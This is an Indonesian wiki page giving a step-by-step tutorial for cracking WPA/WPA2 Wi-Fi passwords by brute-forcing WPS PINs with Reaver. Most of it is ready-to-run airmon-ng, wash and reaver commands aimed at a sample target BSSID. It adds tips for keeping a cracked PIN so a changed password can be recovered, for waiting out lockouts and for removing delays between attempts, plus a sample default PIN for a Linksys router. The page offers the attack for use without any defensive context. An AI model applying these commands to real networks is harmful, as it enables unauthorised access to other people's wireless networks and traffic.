Difference between revisions of "Reaver teknik menjebol WPA"

Sumber: http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/

WPS ada di kebanyakan router untuk proses setup yang mudah melalui pin WPS, yang di hard-coded ke Access Point wireless. Reaver mengambil keuntungan dari kerentanan di WPS. Terima kasih kepada Craig Heffner untuk merilis versi open-source dari tool ini yang bernama Reaver yang mengeksploitasi kerentanan. Dalam istilah sederhana, Reaver mencoba untuk bruteforce pin; yang akan mengungkapkan WPA atau WPA2 password setelah cukup waktu.

Kumpulkan Informasi

Lakukan

airmon-ng

Aktifkan Mode Monitor

Lakukan

airmon-ng check kill
airmon-ng start wlan0

Cek AP yang WPS-nya aktif

Lakukan

wash -i mon0

Mikrotik biasanya tidak mengaktifkan WPS, jadi akan susah menjebol Mikrotik. Sebaliknya, Linksys, TP-Link dll biasanya mengaktifkan WPS.

Crack

Lakukan

reaver -i monitormode -c channel -b targetbssid -vv
reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv

Tip & Trick

Sebaiknya pin WPS yang sudah di crack kita simpan, agar bisa lebih mudah meng-crack password kalau AP mengubah password-nya.

reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv
reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv

Jika setelah 10 WPS ada error, ada warning message. Ini berarti AP membatasi pin attempt. Kita perlu wait,

reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

Default receive timeout 5 detik. Bisa di set secara manual, minimum default 1 detik.

reaver -i mon0 -b 00:01:02:03:04:05 -t 3

Default delay antara pin attempt adalah 1 detik, nilai ini dapat di naikan / diturunkan. Nilai 0 adalah tanpa delay.

reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Contoh PIN WPS

Di Linksys WAP610N 98539437

Referensi

• http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/